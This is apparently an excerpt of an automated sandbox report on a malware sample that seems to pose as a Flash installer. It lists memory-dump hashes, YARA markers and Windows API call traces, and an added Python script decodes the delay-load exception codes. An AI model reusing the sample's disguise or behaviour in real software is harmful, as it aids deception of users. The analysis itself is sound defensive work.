                                                                                                                                                                                                                    • Opcode ID: 8535c9886879715d47f053a0bc1f19842ad049800703a54e314d7d200f5250d5
                                                                                                                                                                                                                    • Instruction ID: ad6b67f823f119424c0fd3545dea8354206030b433d2bbab8d1cb6d18980cb4c
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 8535c9886879715d47f053a0bc1f19842ad049800703a54e314d7d200f5250d5
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 0A312473D443128FD74BEF79EC8A15A372AEB83311B81872AE902DB4A6CF3445418A94
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000000.00000002.1613713857.0000000000B00000.00000040.00001000.00020000.00000000.sdmp, Offset: 00B00000, based on PE: false
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_b00000_fghj.jbxd
                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                    • Opcode ID: e616d77bd3da61b127fdc329f188a9c1457f802ee88feb876315bce3e712fc88
                                                                                                                                                                                                                    • Instruction ID: 3a3090b13b499658bfee81d6997d4c698397b44f0a2db884de726b3fefae1a86
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: e616d77bd3da61b127fdc329f188a9c1457f802ee88feb876315bce3e712fc88
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 062100752146419FD769CF24C895BB3B7E2FB96300F59C8ACE086D7256EE32E881CB50
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000000.00000002.1613713857.0000000000B00000.00000040.00001000.00020000.00000000.sdmp, Offset: 00B00000, based on PE: false
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_b00000_fghj.jbxd
                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                    • Opcode ID: 8c7ad75f5222e5dca6cc9cc0964ba730eccd98d0e08584d583e586e03913b28b
                                                                                                                                                                                                                    • Instruction ID: db73958d84b06df8c88b5e4ead2536a7a7e7ba2ad2d067e84e26a7d70f16ed23
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 8c7ad75f5222e5dca6cc9cc0964ba730eccd98d0e08584d583e586e03913b28b
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: F42136397082108FC708DF18C8921BABFE5EB86311FA448BCD4C29B355D639DC92AB56
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000000.00000002.1613713857.0000000000B00000.00000040.00001000.00020000.00000000.sdmp, Offset: 00B00000, based on PE: false
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_b00000_fghj.jbxd
                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                    • Opcode ID: aecd86bd7d6fd731bd9b707a8662fe33e6cee09a7e3f8aef5de16f6945abd593
                                                                                                                                                                                                                    • Instruction ID: 23be09cc6e8411d564aa2d4f9e4ef4e06d149cd18fb8356a4c4ab9dd3a3d92be
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: aecd86bd7d6fd731bd9b707a8662fe33e6cee09a7e3f8aef5de16f6945abd593
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 7B21B1356091B08EDB158E3C9490268BBE3AF67320F7C43D8E4B55B3F6CA655D05C751
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000000.00000002.1613713857.0000000000B00000.00000040.00001000.00020000.00000000.sdmp, Offset: 00B00000, based on PE: false
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_b00000_fghj.jbxd
                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                    • Opcode ID: 4c74c9ecc30582568138949de965b1d5bb752f1254393683668c12d8e05b3c12
                                                                                                                                                                                                                    • Instruction ID: 091c072faa6c2e043267792138e6c353f4f9e0c2b9ad2bb060142777d0b9f1ab
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 4c74c9ecc30582568138949de965b1d5bb752f1254393683668c12d8e05b3c12
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 2221C1B0916232CBD724CF68E81056AB7B1FFA6360B15539CD8946F391E7758881CBC8
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000000.00000002.1613713857.0000000000B00000.00000040.00001000.00020000.00000000.sdmp, Offset: 00B00000, based on PE: false
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_b00000_fghj.jbxd
                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                    • Opcode ID: cba93b24be6c1e5e8276fc5b9dbb34ce7168519879c0d9be808e40dbfcb486c2
                                                                                                                                                                                                                    • Instruction ID: 31de08a6853f8494931f33c3f0b30081a24e9a53ee33c762fea098f10aa84f98
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: cba93b24be6c1e5e8276fc5b9dbb34ce7168519879c0d9be808e40dbfcb486c2
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: C511B970504781DFE7114F2988207B2BFF0EF67320F5815C4D4E69B2A2C7249855C765
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000000.00000002.1613713857.0000000000B00000.00000040.00001000.00020000.00000000.sdmp, Offset: 00B00000, based on PE: false
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_b00000_fghj.jbxd
                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                    • Opcode ID: b4ff4992335c3c298c7c889337f7834d19d2f20cebc5d6d511f5b31fbcd6fb19
                                                                                                                                                                                                                    • Instruction ID: ad2eeea53a6e30dbed82b56503d87fadea2b3f6eeddb128332379473ddf172e0
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: b4ff4992335c3c298c7c889337f7834d19d2f20cebc5d6d511f5b31fbcd6fb19
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: CE2195739526244FD3108DA4C8847517656E7C5328F3E46B9DD249F7D2C97B6C1386C0
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000000.00000002.1613713857.0000000000B00000.00000040.00001000.00020000.00000000.sdmp, Offset: 00B00000, based on PE: false
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_b00000_fghj.jbxd
                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                    • Opcode ID: 1f97b61df27a8662b840fe1322ddf3d4eb7995fccb47ca0f9e58af39a05e2b39
                                                                                                                                                                                                                    • Instruction ID: 499b2f412122724a0863f777e590d489563ecc0a3efaa8f14897350ee78377cd
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 1f97b61df27a8662b840fe1322ddf3d4eb7995fccb47ca0f9e58af39a05e2b39
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 7521F535A812188BEB19CF25CC85BEDBBB2FB9A300F2884EDD445A3345DB3999058F14
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000000.00000002.1613713857.0000000000B00000.00000040.00001000.00020000.00000000.sdmp, Offset: 00B00000, based on PE: false
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_b00000_fghj.jbxd
                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                    • Opcode ID: 6a5704204b09268cfd056bcfe6babae032859a7a6013e9e1529113b483bd82b1
                                                                                                                                                                                                                    • Instruction ID: 15f5c20d93ea1dfbd6a13a932924d06797880592892bebf6711e68cd5f1bb0e8
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 6a5704204b09268cfd056bcfe6babae032859a7a6013e9e1529113b483bd82b1
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: EA113678244340AFE718CF108C56BBA7BE5DB82700FA0546CF5C2AB2D1DA349C428B55
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000000.00000002.1613368173.00000000003A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003A0000, based on PE: true
                                                                                                                                                                                                                    • Associated: 00000000.00000002.1613350160.00000000003A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000000.00000002.1613385259.00000000003AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000000.00000002.1613401600.00000000003AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000000.00000002.1613417554.00000000003AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_3a0000_fghj.jbxd
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000000.00000002.1613713857.0000000000B00000.00000040.00001000.00020000.00000000.sdmp, Offset: 00B00000, based on PE: false
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_b00000_fghj.jbxd
                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                    • Opcode ID: 2f432f6d4d57ddd5edf10f0a55197208a6667e030cc273150dee4b63bd6a15e3
                                                                                                                                                                                                                    • Instruction ID: 725e9fc85aae84302c1ae7b3f8fc1300338943a63b32a3fb6c3c6798f00e9057
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 2f432f6d4d57ddd5edf10f0a55197208a6667e030cc273150dee4b63bd6a15e3
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: AD019234A11108EBCB15EF98C194AADBBF5FB45315F6086E9DC159B391C730AE42DBA0
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000000.00000002.1613713857.0000000000B00000.00000040.00001000.00020000.00000000.sdmp, Offset: 00B00000, based on PE: false
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_b00000_fghj.jbxd
                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                    • Opcode ID: fe9091a269dde85ea37ff48247502998e8bf628bc9e4cf245add92d9984e6776
                                                                                                                                                                                                                    • Instruction ID: 73fede840ff21142a62192b9982d30a5c8ca6107d1b829141dd81332c983a1d2
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: fe9091a269dde85ea37ff48247502998e8bf628bc9e4cf245add92d9984e6776
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: C0D0A7789001047B81589729DC0BD737A7DD343214F412234EC45E3390C900EC1143FF
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000000.00000002.1613713857.0000000000B00000.00000040.00001000.00020000.00000000.sdmp, Offset: 00B00000, based on PE: false
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_b00000_fghj.jbxd
                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                    • Opcode ID: 76c82190522b7c7453c1da42fb0813f6199d4d60ef68341f0432e3342fc413fa
                                                                                                                                                                                                                    • Instruction ID: 43bb3d20e1b392e409b6c253e277c8ed415cac0607997f185d5a77d36cb7cd87
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 76c82190522b7c7453c1da42fb0813f6199d4d60ef68341f0432e3342fc413fa
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: FCD012BAF8260087DA499F34DC43AA9616752D722270CF1345417D739BD83CD455402E
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000000.00000002.1613713857.0000000000B00000.00000040.00001000.00020000.00000000.sdmp, Offset: 00B00000, based on PE: false
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_b00000_fghj.jbxd
                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                    • Opcode ID: 3472be5c6ac56d2b04134d5d7df96adbf9b90126a51f7feffe32bb227cbf3e08
                                                                                                                                                                                                                    • Instruction ID: 1fce5fdaaed316b99bc8c9f69f208e0d0372c3c5073808f258a01a060ef95f83
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 3472be5c6ac56d2b04134d5d7df96adbf9b90126a51f7feffe32bb227cbf3e08
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 13B092A2C40100CAD0512F502C424BAB4794593A91F04E0B4F80A223A2A616E21A505B
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000000.00000002.1613713857.0000000000B00000.00000040.00001000.00020000.00000000.sdmp, Offset: 00B00000, based on PE: false
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_b00000_fghj.jbxd
                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                    • Opcode ID: 51e5cc0691258e225b49338ebd35a17b83519d4d253bb02e098b66d673d50b29
                                                                                                                                                                                                                    • Instruction ID: 09f0fc126c9f497e77680c56fc77242282f4e601c4da94002c963cbedc3cfd34
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 51e5cc0691258e225b49338ebd35a17b83519d4d253bb02e098b66d673d50b29
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 41B092B1C142418BC6409F509842826B6B16687250F146834E008A32A1DA22D819860E
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000000.00000002.1613713857.0000000000B00000.00000040.00001000.00020000.00000000.sdmp, Offset: 00B00000, based on PE: false
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_b00000_fghj.jbxd
                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                    • Opcode ID: f4cfd0e22bdd2c3dcf4781f09dc9b2c3b3b182c6d4491cca677f86ccd1ad79f8
                                                                                                                                                                                                                    • Instruction ID: 7c727fdc30bbd10aad62ac5e0f75ebb1f2f57e37e059c0bb7094052ef7a9a508
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: f4cfd0e22bdd2c3dcf4781f09dc9b2c3b3b182c6d4491cca677f86ccd1ad79f8
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 9EB01290C04100C6C040DF009C01571F17C010B541F00B020E40DA3253D110E100411D
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000000.00000002.1613713857.0000000000B00000.00000040.00001000.00020000.00000000.sdmp, Offset: 00B00000, based on PE: false
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_b00000_fghj.jbxd
                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                    • Opcode ID: 7d7b0932c5cb6e64dd9628b3f9b4fec10a2f96da8f175b69ac8e2ac2258ca3ee
                                                                                                                                                                                                                    • Instruction ID: 707a55c5cb6d3590ac796a1d8221a9a5f08f5b68c65dc43c2df98c77c39286a9
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 7d7b0932c5cb6e64dd9628b3f9b4fec10a2f96da8f175b69ac8e2ac2258ca3ee
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: DDB012D0C0424082C000DF109C41471E1BC410B141F107420E00EA3253D110E100811D
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000000.00000002.1613713857.0000000000B00000.00000040.00001000.00020000.00000000.sdmp, Offset: 00B00000, based on PE: false
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_b00000_fghj.jbxd
                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                    • Opcode ID: 143a470172efcfefaa0e3cb3f7de688c7be185c0810369f0038da372c170ac48
                                                                                                                                                                                                                    • Instruction ID: 9cfe8b7b2cca3ed6965cf08700479d47634cb2f8ac0b04f26527788029bfee64
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 143a470172efcfefaa0e3cb3f7de688c7be185c0810369f0038da372c170ac48
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: CAA00228D481009681108F09A480470E6B8B30F516F503610905CF3115C210D544450C
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    • RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 003AAEA3
                                                                                                                                                                                                                    • LoadLibraryA.KERNEL32(?), ref: 003AAF20
                                                                                                                                                                                                                    • GetLastError.KERNEL32 ref: 003AAF2C
                                                                                                                                                                                                                    • RaiseException.KERNEL32(C06D007E,00000000,00000001,?), ref: 003AAF5F
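                                                                                                                                                                                                                     The four calls above (RaiseException with 0xC06D0057 and 0xC06D007E, LoadLibraryA, GetLastError) match the pattern of the MSVC delay-load helper from delayimp.h, which raises VcppException(ERROR_SEVERITY_ERROR, ERROR_MOD_NOT_FOUND) when a delay-loaded DLL cannot be loaded, so this function is most likely CRT glue rather than sample logic. The decoder below is an added example for triaging such traces; it is not part of the Joe Sandbox report or of the sample. The trace text is copied from the API list above, and the only facts assumed are the public NTSTATUS bit layout, FACILITY_VISUALCPP (0x6D) and the winerror.h values 87, 126 and 127; the names parse_trace, decode_exception_code, delayload_exception_codes and looks_like_delayload_helper are the example's own.

```python
import re

# Trace lines copied from the APIs list above (Joe Sandbox output, not constructed).
TRACE = """\
RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 003AAEA3
LoadLibraryA.KERNEL32(?), ref: 003AAF20
GetLastError.KERNEL32 ref: 003AAF2C
RaiseException.KERNEL32(C06D007E,00000000,00000001,?), ref: 003AAF5F
"""

# delayimp.h: VcppException(sev, err) = sev | (FACILITY_VISUALCPP << 16) | err
FACILITY_VISUALCPP = 0x6D

# winerror.h values the delay-load helper wraps.
WIN32_ERRORS = {
    0x57: "ERROR_INVALID_PARAMETER",
    0x7E: "ERROR_MOD_NOT_FOUND",
    0x7F: "ERROR_PROC_NOT_FOUND",
}
SEVERITY = {0: "SUCCESS", 1: "INFORMATIONAL", 2: "WARNING", 3: "ERROR"}

LINE_RE = re.compile(
    r"^(?P<api>\w+)\.(?P<module>\w+)"        # RaiseException.KERNEL32
    r"(?:\((?P<args>[^)]*)\))?"              # optional (arg,arg,...)
    r",?\s+ref:\s+(?P<ref>[0-9A-Fa-f]+)$"    # , ref: 003AAEA3
)


def parse_trace(text: str) -> list[dict]:
    """Parse 'Api.MODULE(args), ref: addr' lines into dicts; skip lines that do not match."""
    calls = []
    for line in text.splitlines():
        m = LINE_RE.match(line.strip())
        if not m:
            continue
        args = m["args"].split(",") if m["args"] else []
        calls.append({"api": m["api"], "module": m["module"],
                      "args": args, "ref": int(m["ref"], 16)})
    return calls


def decode_exception_code(code: int) -> dict:
    """Split an NTSTATUS-style exception code into its bit fields.

    bits 31-30 severity, bit 29 customer flag, bits 27-16 facility, bits 15-0 code.
    The MSVC C++ throw code 0xE06D7363 has the customer bit set; delay-load
    failures (0xC06D00xx) do not, which is how the two are told apart here.
    """
    sev = (code >> 30) & 0x3
    customer = bool((code >> 29) & 0x1)
    facility = (code >> 16) & 0xFFF
    error = code & 0xFFFF
    return {
        "code": f"0x{code:08X}",
        "severity": SEVERITY[sev],
        "customer": customer,
        "facility": facility,
        "error": error,
        "win32_name": WIN32_ERRORS.get(error, "UNKNOWN"),
        "is_delayload": (sev == 3 and not customer
                         and facility == FACILITY_VISUALCPP and error in WIN32_ERRORS),
    }


def delayload_exception_codes(calls: list[dict]) -> list[dict]:
    """Decoded codes for every RaiseException whose first argument is a delay-load VcppException."""
    found = []
    for c in calls:
        if c["api"] != "RaiseException" or not c["args"]:
            continue
        try:
            code = int(c["args"][0], 16)
        except ValueError:  # '?' means the sandbox did not recover the argument
            continue
        decoded = decode_exception_code(code)
        if decoded["is_delayload"]:
            found.append(decoded)
    return found


def looks_like_delayload_helper(calls: list[dict]) -> bool:
    """True when the trace raises a delay-load VcppException after calling LoadLibrary*."""
    apis = {c["api"] for c in calls}
    loads_dll = any(a.startswith("LoadLibrary") for a in apis)
    return loads_dll and bool(delayload_exception_codes(calls))


if __name__ == "__main__":
    parsed = parse_trace(TRACE)
    for d in delayload_exception_codes(parsed):
        print(f"{d['code']}: {d['severity']} facility=0x{d['facility']:X} -> {d['win32_name']}")
    print("delay-load helper pattern:", looks_like_delayload_helper(parsed))
```

                                                                                                                                                                                                                     The customer-bit check matters in practice: 0xE06D7363 (the ordinary MSVC C++ exception) shares facility 0x6D and shows up in almost every C++ binary, whereas 0xC06D007E indicates a delay-loaded import that failed to resolve, which in a stealer can hint at a missing dependency on the analysis VM rather than at intended behaviour.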
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000000.00000002.1613368173.00000000003A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003A0000, based on PE: true
                                                                                                                                                                                                                     • Associated: 00000000.00000002.1613350160.00000000003A0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                     • Associated: 00000000.00000002.1613385259.00000000003AC000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                     • Associated: 00000000.00000002.1613401600.00000000003AE000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                     • Associated: 00000000.00000002.1613417554.00000000003AF000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_3a0000_fghj.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: ExceptionRaise$ErrorLastLibraryLoad
                                                                                                                                                                                                                    • String ID: $
                                                                                                                                                                                                                    • API String ID: 948315288-3993045852
                                                                                                                                                                                                                    • Opcode ID: a6811a3833de14005710a5aa7ddce018d5b9c92b20c8c030693bb1e5ebe405f9
                                                                                                                                                                                                                    • Instruction ID: 84325949b77a67fe85ce8c2001250305afcc8d0c93100262cb1c020fab16fed7
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: a6811a3833de14005710a5aa7ddce018d5b9c92b20c8c030693bb1e5ebe405f9
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: AC815DB5A00605DFDB16CFA8C885BAEB7F9FF49300F158129E915D7250EBB0E940CB61
APIs
• GetModuleHandleW.KERNEL32(00000000), ref: 003A41FE
• GetCommandLineW.KERNEL32 ref: 003A4206
  • Part of subcall function 003A450F: GetProcessHeap.KERNEL32(00000000,?,003A101A,?,?,003A11AF,003A4215,00000000,?,00000000,?,003A1421,?,00000000,?,003A4215), ref: 003A4515
  • Part of subcall function 003A450F: HeapAlloc.KERNEL32(00000000,?,003A4215,00000000), ref: 003A451C
  • Part of subcall function 003A4523: GetProcessHeap.KERNEL32(00000000,?,003A56F5,00000000,?,0000005C,Flash,?,?,0000005C,Macromed,?,?,?,00000000), ref: 003A4529
  • Part of subcall function 003A4523: HeapFree.KERNEL32(00000000,?,0000005C,Flash,?,?,0000005C,Macromed,?,?,?,00000000), ref: 003A4530
• ExitProcess.KERNEL32 ref: 003A44FC
  • Part of subcall function 003A2023: GetEnvironmentVariableW.KERNEL32(ComSpec,?,00000104,00000000,00000000), ref: 003A204E
Strings
Memory Dump Source
• Source File: 00000000.00000002.1613368173.00000000003A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003A0000, based on PE: true
• Associated: 00000000.00000002.1613350160.00000000003A0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1613385259.00000000003AC000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1613401600.00000000003AE000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1613417554.00000000003AF000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_3a0000_fghj.jbxd
Similarity
• API ID: Heap$Process$AllocCommandEnvironmentExitFreeHandleLineModuleVariable
• String ID: Flash$FlashInstall.log$Macromed$PostfixCommandLine$PrefixCommandLine
• API String ID: 2400563013-3347144162
• Opcode ID: b2e80fed286650e264f247123b19da62f04feee3ce172de86f65bc56e8043e1a
• Instruction ID: e935e6fee5eeb99cabb12a56f76c84a4bb27269a38e3b33c145a3d5ac91e45c2
• Opcode Fuzzy Hash: b2e80fed286650e264f247123b19da62f04feee3ce172de86f65bc56e8043e1a
• Instruction Fuzzy Hash: 49917271A102047BDF0BF7B5DC57EBE7AADEF8B350F00051DF102AB192EE64A9458661
APIs
• GetModuleHandleW.KERNEL32(kernel32,00000000), ref: 003A6D34
• GetProcAddress.KERNEL32(00000000,IsWow64Process), ref: 003A6D4D
• GetCurrentProcess.KERNEL32(?), ref: 003A6D59
• GetProcAddress.KERNEL32(00000000,GetSystemWow64DirectoryW), ref: 003A6D6F
Strings
Memory Dump Source
• Source File: 00000000.00000002.1613368173.00000000003A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003A0000, based on PE: true
• Associated: 00000000.00000002.1613350160.00000000003A0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1613385259.00000000003AC000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1613401600.00000000003AE000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1613417554.00000000003AF000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_3a0000_fghj.jbxd
Similarity
• API ID: AddressProc$CurrentHandleModuleProcess
• String ID: GetSystemWow64DirectoryW$IsWow64Process$kernel32
• API String ID: 977827838-3456838754
• Opcode ID: d6c24ef26db1241010c2f2eac045a7ea013fdfdd21109030deb7a5c44a0b481f
• Instruction ID: b2ad763af617ce0af9e973adb774cf245d9109410404018cde01a0ccd8a737de
• Opcode Fuzzy Hash: d6c24ef26db1241010c2f2eac045a7ea013fdfdd21109030deb7a5c44a0b481f
• Instruction Fuzzy Hash: 7821B071A102189FDB22EBB89C86AEEB7ACEB4B744F150019E515D7181DB74D805CB60
APIs
• CreateWaitableTimerW.KERNEL32(00000000,00000001,00000000), ref: 003A4739
  • Part of subcall function 003A46F7: SetWaitableTimer.KERNEL32(?,?,00000000,003A46EB,?,00000000,?,?,?,003A4749), ref: 003A471D
• CloseHandle.KERNEL32(?), ref: 003A4941
• CloseHandle.KERNEL32(?), ref: 003A49A1
• ExitThread.KERNEL32 ref: 003A49B0
  • Part of subcall function 003A45E5: ReleaseMutex.KERNEL32(00000008,003A46AC,000000FF,00000000,00000000,003A40EB,003A664F,00000005,?,?,0000005C,00000090,?,?,?,003AC824), ref: 003A45E7
Strings
Memory Dump Source
• Source File: 00000000.00000002.1613368173.00000000003A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003A0000, based on PE: true
• Associated: 00000000.00000002.1613350160.00000000003A0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1613385259.00000000003AC000.00000002.00000001.01000000.00000003.sdmp
